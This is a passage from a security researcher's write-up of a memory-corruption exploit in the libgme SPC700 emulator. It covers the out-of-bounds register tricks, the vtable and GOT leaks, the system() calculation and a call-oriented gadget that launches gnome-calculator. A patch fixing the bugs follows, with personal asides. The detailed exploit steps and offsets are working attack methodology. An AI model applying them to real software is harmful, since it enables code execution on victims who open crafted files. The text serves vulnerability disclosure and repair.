It’s worth remembering that as we abuse the 0xAF opcode to bump up the value of the X register, it writes to the virtual address of the X register, effectively corrupting anything we put there. In this stage, virtual addresses 0xff - 0x1fe get corrupted. In later stages, other smaller areas of virtual RAM get corrupted.
To avoid all these areas of corruption, we host the main code and metadata at virtual address 0x800 - 0xa00 with supporting routines at 0x700. To avoid mistakes, the input file marks virtual addresses which get nailed with the byte 0xfe.

2: A bit of register copying, more additions and then a multiply (MUL, 0xCF)
The X register value of 511 is copied to the A and then Y register. The X register is then further bumped up using 0xAF again, to 513. This is transferred to A.
The MUL instruction is called, which does Y * A, or 511 * 513. The resulting value in Y, after the final right shift by 8, is 0x3ff.

3: Repeat the process of multiplying 2^n + 1 and 2^n - 1
The power of using (2^n + 1) * (2^n - 1) is that after the right shift by 8, this leaves us with a 2^n - 1 result in the Y register. This keeps our result as high as possible without getting to 2^16, which is too large and would leave us with integer overflow.
The sequence of resulting values in the Y register is: 0x3ff, 0xfff, 0xffff, 0xffffff.

4: Use of the division opcode (DIV, 0x9E) to create a negative value
With input A = 0, X = 257, Y = 16777215, we end up with Y = -131583
That’s actually a little large compared to what we need, as it references too far back in memory for us to be able to hit the Spc_Emu object. Playing around some more, we can use our new value and another DIV to get a more amenable value:
With input A = X = Y = -131583, we end up with Y = -65024. That’s much better. Since that value is close to but a bit smaller than negative the size of the 64kB address space, we’ll be able to corrupt backwards far enough to hit any field in the Spc_Emu object, but also still be able to corrupt forwards to conveniently read and write the first few hundred bytes of the virtual RAM.

5: Read the vtable value and store it at virtual RAM address 0x20 for convenience
Looking at offset 0xa00 in the exploit file, we see the first line of a table of reads and writes that are made:
7C EA 20 FE 00 00 00 00 00 00 00 00 76 74 62 6C
This is instructing the exploit loop to read 8 bytes from virtual address 0xea7c + Y, add the 8 byte constant 0, and then write to 0xfe20 + Y. (The last 4 bytes are not used in the code and in this case they spell “vtbl” to remind me what each line does.) Because it’s nice to look at a little 5A22 code, here’s the routine that implements the read / add / write loop:

       CLRC             ; clear carry, for clean addition
       MOV X,#8         ; loop for 8 bytes
loop:
       MOV A,(0x80)+Y   ; read one byte using OOB Y
       PUSH X           ; save X
       MOV X,#0         ; set X to 0
       ADC (0x84+X)     ; add constant from table
       POP X            ; restore X
       MOV (0x82)+Y,A   ; write one byte using OOB Y
       INC 0x80         ; increment read location
...
       INC 0x82         ; increment addition constant location
...
       INC 0x84         ; increment write location
       DEC X            ; done one byte
       BNE loop         ; if not all 8 done, continue
       RTS              ; otherwise return

This code could be better: I didn’t take advantage of the 16-bit increment operations and I think I may have used a clumsy addressing mode for the ADC (add with carry). But it works. The reason it corrupts memory is that the Y register has a negative value in it. Once we get the negative value into the Y register, we just leave it there and never change it. For example, the instruction MOV A,(0x80)+Y loads a 16-bit virtual address from memory location 0x80, which we populated with 0xea7c from the metadata table. Then, Y (-65024) is added, giving -4996 as the actual virtual address that is read from. And in the real host heap, 4996 bytes before the start of the virtual RAM storage is the Spc_Emu vtable pointer. Voila.

6: Calculate the vtable value + 0x6d8, and store it at virtual address 0x28
The vtable value + 0x6d8 is the address of the free() GOT entry. As a reminder, the GOT is read only because we’re talking about the Fedora exploit.

7: Reload the address of the free() GOT entry and copy it to Spc_Emu::buf_begin
We also copy the address of the free() GOT entry, with an addition of 8, and store it to Spc_Emu::buf_end.

8: Corrupt some other timing related fields to make the sample generation engine behave
At this stage, we’re operating the main emulator object in a corrupt state, so we need to further corrupt some other fields to avoid problems. We set Spc_Emu::extra_clocks to -32760 so that the addition in Snes_Spc::end_frame ends up being close to 0 (8 I think), a safe value for our needs. We also set Spc_Emu::dsp_time to 0, a value which prevents the DSP (digital sound? processor) from running at all in Snes_Spc::end_frame. The DSP is a large chunk of code that touches a ton of state so causing a simple corruption to stop it running at all makes things safer and easier to reason about.

9: Allow the frame to end
We now end the current frame. To do this, we just run in a CPU loop that burns through our remaining CPU cycle budget. The loop is actually a little special; we’ll cover it more below. Once our virtual CPU pauses, some post-frame processing occurs. The DSP does not run because we caused a corruption to have that effect. But Snes_Spc::save_extra does run, which appears to be designed to handle small cycle offsets in the virtual CPU clock time vs. the virtual DSP clock time. Because of the buf_begin, buf_end and extra_clocks corruption we caused in steps above, the resulting effect is that 8 bytes of memory are read which correspond to the value of the free() function pointer inside the GOT. These bytes are placed in Spc_Emu::extra_buf.

10: New frame starts
When a new frame starts, we have the interesting problem: how does our virtual CPU know that a new frame has started? If the CPU is virtualized correctly, it shouldn’t really notice that its effort is being rationed into “frames”. And we do need to know that a new frame has started, because we need to know that interesting bytes await us in Spu_Emu::extra_buf, from step 9 above.

The solution is to monitor for a side effect that frustrated us (blargg! etc.) earlier. But now we can use it to our advantage. Take that, frustration! The act of exiting and then entering a frame saves and restores the CPU registers, clamping them to 8-bit values. So while we are waiting for the new frame, we have the CPU simply repeatedly do a multiplication that results in one value if our corrupt Y register is still corrupt, and another value if it has been clamped.

When the new frame does start, we need to start from scratch to re-generate the out-of-bounds value in the Y register so that we can continue to corrupt memory. Not a problem: we already have that code.

11: Save the free() pointer value from Spc_Emu::extra_buf
We read this value and save it at virtual address 0x30.

12: Calculate where system() is
Now that we have the value of free(), which is inside glibc, we can easily calculate the value of system(), which will be at a fixed offset. We do so and store it at virtual address 0x38.

13: Grab the Spc_Dsp::ram pointer
And store it at 0x40.

14: Read the ram pointer, add 0x100 to it, and overwrite the Spc_Emu vtable
Yeah, now it’s getting real. We now host a vtable at virtual address 0x100 in our virtual RAM.

15: Calculate vtable - 2370739 and store that at virtual RAM address 0x180
This is a bit magic. Also two more bits of magic:
Calculate ram + 0xc0 and store that at &Spc_Emu::vtable + 16.
Store system() at &Spu_Emu::vtable + 8.

16: Frame tick again. Exploitation occurs. Calc appears.
What just happened?
  • After the frame tick, the play routine Spc_Emu::play_() is called again. It is virtual, and the vtable entry is at offset 0x80 into the vtable.
  • We corrupted the vtable to point to 0x100 in virtual RAM, so a virtual call is made to the pointer at 0x180 in virtual RAM. This is vtable - 2370739.
  • At vtable - 2370739, in libgme.so, is the following little x86_64 instruction sequence:
       8bdd:       48 89 f8                mov    %rdi,%rax
       8be0:       48 8b 7f 10             mov    0x10(%rdi),%rdi
       8be4:       48 8b 40 08             mov    0x8(%rax),%rax
       8be8:       89 da                   mov    %ebx,%edx
       8bea:       ff d0                   callq  *%rax
  • This loads the pointer at object offset 0x10 into %rdi, which is where we put a pointer to offset 0xc0 into virtual RAM. That happens to be where the string “gnome-calculator” is in the input file.
  • Then this loads the pointer at object offset 0x8 into %rax, which is where we put system().
  • Then, it calls %rax, which calls system(). The first argument in the x86_64 ABI is %rdi, which points to “gnome-calculator”. Ergo, let’s math!
  • This is a COP (call-oriented programming) payload, not ROP. In my opinion, ROP has issues. I recommend you prefer COP if you can. The reason I used any form of *OP is laziness. The path of least resistance to getting around Fedora’s RELRO was a quick little COP gadget. My usual trick of overwriting __free_hook looked to be messy.

Closing notes
Nothing much to add.
Excessive jolliness of Christmas songs getting you down? Try Fairytale of New York, by The Pogues.

Appendix A: patch
No reason I shouldn’t propose a patch. Here it is. It fixes the two noted vulnerabilities and adds a bit of defensiveness to the opcodes that assisted exploitation. Ideally, the types of the local registers should be changed to uint8_t to provide a bunch more robustness. Perhaps the small performance difference mattered over a decade ago, when this code was written. Unlikely to still be the case.

diff -rubB gme-old/Spc_Cpu.h gme/Spc_Cpu.h
--- gme-old/Spc_Cpu.h   2016-12-10 19:05:05.000000000 -0800
+++ gme/Spc_Cpu.h       2016-12-12 15:43:11.563377845 -0800
@@ -76,8 +76,8 @@
// TODO: remove non-wrapping versions?
#define SPC_NO_SP_WRAPAROUND 0

-#define SET_SP( v )     (sp = ram + 0x101 + (v))
-#define GET_SP()        (sp - 0x101 - ram)
+#define SET_SP( v )     (sp = ram + 0x101 + ((uint8_t) v))
+#define GET_SP()        (uint8_t) (sp - 0x101 - ram)

#if SPC_NO_SP_WRAPAROUND
#define PUSH16( v )     (sp -= 2, SET_LE16( sp, v ))
@@ -485,7 +485,7 @@

       case 0xAF: // MOV (X)+,A
               WRITE_DP( 0, x, a + no_read_before_write  );
-               x++;
+               x = (uint8_t) (x + 1);
               goto loop;

// 5. 8-BIT LOGIC OPERATION COMMANDS
@@ -808,7 +808,7 @@
               unsigned temp = y * a;
               a = (uint8_t) temp;
               nz = ((temp >> 1) | temp) & 0x7F;
-               y = temp >> 8;
+               y = (uint8_t) (temp >> 8);
               nz |= y;
               goto loop;
       }
@@ -838,6 +838,7 @@

               nz = (uint8_t) a;
               a = (uint8_t) a;
+               y = (uint8_t) y;

               goto loop;
       }
@@ -1004,7 +1005,7 @@
       case 0x7F: // RET1
               temp = *sp;
               SET_PC( GET_LE16( sp + 1 ) );
-               sp += 3;
+               SET_SP(GET_SP() + 3);
               goto set_psw;
       case 0x8E: // POP PSW
               POP( temp );

Appendix B: Godspeed to you, Terry Pratchett
“There is another point, of course. It would be a tragedy should anything untoward happen to our little visitor. It would be dreadful if he were to die, for example. Dreadful for the whole of our land, because the Agatean Emperor looks after his own and could certainly extinguish us at a nod. A mere nod. And that would be dreadful for you, Rincewind, because in the weeks that remained before the Empire’s huge mercenary fleet arrived certain of my servants would occupy themselves about your person in the hope that the avenging captains, on their arrival, might find their anger tempered by the sight of your still-living body. There are certain spells that can prevent the life departing from a body, be it never so abused, and- I see by your face that understanding dawns?”


“Yarrg.”